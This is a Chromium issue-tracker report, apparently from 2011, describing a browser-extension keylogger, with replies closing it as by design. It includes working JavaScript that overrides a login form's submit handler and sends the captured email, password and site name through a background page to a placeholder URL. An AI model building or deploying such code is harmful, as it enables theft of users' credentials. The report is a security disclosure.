New issue
Advanced search Search tips

Issue 78783 link

Starred by 1 user

Issue metadata

Status: Invalid
Owner: ----
Closed: Feb 2013
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 2
Type: ----

Restricted
  • Only users with Commit permission may comment.



Sign in to add a comment

Ability to create built-in keylogger as addon

Reported by mic...@gmail.com, Apr 8 2011

Issue description

VULNERABILITY DETAILS
Any extension is able to bind/change onsubmit event on any form and by 
XMLHttpRequest send data to other domain.

It can happen e.q. to facebook.account. In my opinion fields with type set to password should be viewable from chrome javascript events.
Example in reproduction case.

VERSION
Chrome Version: any
Operating System: any

REPRODUCTION CASE
It's enoough to put this:
<code>

function removeOnSubmit()
{
//return Event.__inlineSubmit(this,event)
	var myformk = document.getElementById('login_form');
	myformk.removeAttribute('onsubmit');
	document.getElementById('login_form').onsubmit = alert;
}
removeOnSubmit();
document.getElementById('login_form').onsubmit = doAction;

function doAction() 
{
	var mydomain=window.location.hostname;
	var dane = mydomain+':'+document.getElementById('email').value+':'+document.getElementById('pass').value;
	chrome.extension.sendRequest({'action' : dane}, onText);
}
</code>
and:
<code>
<!DOCTYPE html>
<!--
 * Copyright (c) 2010 The Chromium Authors. All rights reserved.  Use of this
 * source code is governed by a BSD-style license that can be found in the
 * LICENSE file.
-->
<html>
  <head>
  </head>
  <body>
    <script>
      /**
       * Performs an XMLHttpRequest to Twitter's API to get trending topics.
       * @param callback Function If the response from fetching url has a
       *     HTTP status of 200, this function is called with a JSON decoded
       *     response.  Otherwise, this function is called with null.
       */
      function fetchTwitterFeed(callback, data) {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function(data) {
          if (xhr.readyState == 4) {
            if (xhr.status == 200) {
              var data = JSON.parse(xhr.responseText);
              callback(null);
            } else {
              callback(null);
            }
          }
        }
        // Note that any URL fetched here must be matched by a permission in
        // the manifest.json file!
        var url = 'http://someurltosenddata?data='+data;
        xhr.open('GET', url, true);
        xhr.send();
      };

      /**
       * Handles data sent via chrome.extension.sendRequest().
       * @param request Object Data sent in the request.
       * @param sender Object Origin of the request.
       * @param callback Function The method to call when the request completes.
       */
      function onRequest(request, sender, callback) {
        // Only supports the 'fetchTwitterFeed' method, although this could be
        // generalized into a more robust RPC system.
        
          fetchTwitterFeed(callback, request.action);
        
      };

      // Wire up the listener.
      chrome.extension.onRequest.addListener(onRequest);
    </script>
  </body>
</html>
</code>

in one of your extensions samples: http://code.google.com/chrome/extensions/samples.html#6871d09f4a96bf9d4b6cc724d00e909cee0f3902

to create perfect, invisible password thief. In fact user needs to click only 2 things: to download this extension and than to accept it. Many people do it in affect - they accept many things.

Hope you will change attitude to this.
Yours,
Michal Kulesza




 

Comment 1 by mic...@gmail.com, Apr 8 2011

should NOT be viewable* for sure
Labels: -Restrict-View-SecurityTeam -Type-Security -Pri-0 Pri-2
Status: Invalid
This is by design: if a user installs an extension that requests access to a website, that extension has access to all information on that website, including anything you type in forms.

We cannot have legitimate extensions without this, and we cannot check if an extension is malicious or not. Users will have to check if an extension is trustworthy before installing it - adding more warnings and popups will not fix user indifference. This is the same when you download and run any application.

Project Member

Comment 3 by bugdroid1@chromium.org, Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
Owner: ----
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member

Comment 4 by bugdroid1@chromium.org, Mar 11 2013

Labels: -Area-Undefined

Sign in to add a comment